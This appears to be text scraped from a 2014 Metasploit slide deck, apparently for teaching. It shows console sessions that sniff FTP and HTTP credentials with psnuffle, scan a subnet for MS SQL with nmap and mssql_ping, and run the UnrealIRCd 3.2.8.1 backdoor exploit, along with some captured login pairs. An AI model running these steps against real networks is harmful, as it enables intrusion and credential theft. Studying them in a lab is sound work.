Metasploit 2 Cerutti-IES 2014
Be regular and consistent. In everything, throughout your whole life. Especially in matters of security.
What characterizes a good framework?
frameworks
Microsoft SQL
Available payloads
Exiting (unloading) modules. Command: back
Password Sniffing
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
host_int= &ns_map= _ %2C _ &user_id= &nid= &ts=
[*] Failed FTP Login: : :21 >> fernandocerutti / baguinha
[*] HTTP GET: : : %2C _ &user_id= &nid= &ts=
[*] Successful FTP Login: : :21 >> anonymous /
[*] HTTP GET: : : %2C _ &user_id= &nid= &ts=
[*] Successful FTP Login: : :21 >> anonymous / caraca
HTTP without security: in plaintext
[*] HTTP GET: : :80 analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn= &utmhn= deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid= &utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht= &utmac=UA &utmcc=__utma%3D %3B%2B__utmz%3D utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~
[*] HTTP GET: : :80 E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w
Sniff
[*] HTTP GET: : :80
MS SQL
msf > nmap -sU /24 -p1434
[*] exec: nmap -sU /24 -p1434
Starting Nmap 6.46 ( ) at :26 PST
Nmap scan report for
Host is up (0.049s latency).
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 84:C9:B2:55:A7:03 (D-Link International)
Nmap scan report for
Host is up (0.0053s latency).
PORT STATE SERVICE
1434/udp closed ms-sql-m
MAC Address: 00:0C:29:6F:8D:07 (VMware)
Nmap scan report for
Host is up (0.17s latency).
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS /24
RHOSTS => /24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 182 of 256 hosts (071% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 244 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
Backdoor on Linux
use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) >
msf exploit(unreal_ircd_3281_backdoor) > set RHOST
RHOST =>
msf exploit(unreal_ircd_3281_backdoor) > exploit
Backdoor exploit output
Dotdefender Wget